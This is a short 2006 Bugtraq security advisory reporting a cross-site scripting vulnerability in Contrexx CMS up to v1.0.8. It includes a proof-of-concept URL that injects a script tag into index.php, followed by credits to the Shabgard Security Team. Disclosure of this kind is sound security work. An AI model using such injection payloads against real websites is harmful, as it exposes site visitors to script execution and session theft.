
Date: 18 Mar 2006 11:18:50 -0000
From: Soothackers@...il.com
To: bugtraq@...urityfocus.com
Subject: Contrexx CMS Xss Vuln


------------------------------------------
***Contrexx CMS Xss Vuln*** 
------------------------------------------
 Site :
  http://www.contrexx.com

 Bug :
    http://victim/path/index.php/"><script>alert(/Soot/)</script>

 Vulnerable : 
  All Version ( => v1.0.8 ) 
------------------------------------------
 Source :
  http://soot.shabgard.org/bugs/Contrexx-CMS.txt

 Credit :
  Soot 
  Shabgard Security Team
  http://www.shabgard.org 

 Greetz : 
  Hergy,Elite,Bl2k,Littlehacker,...
------------------------------------------


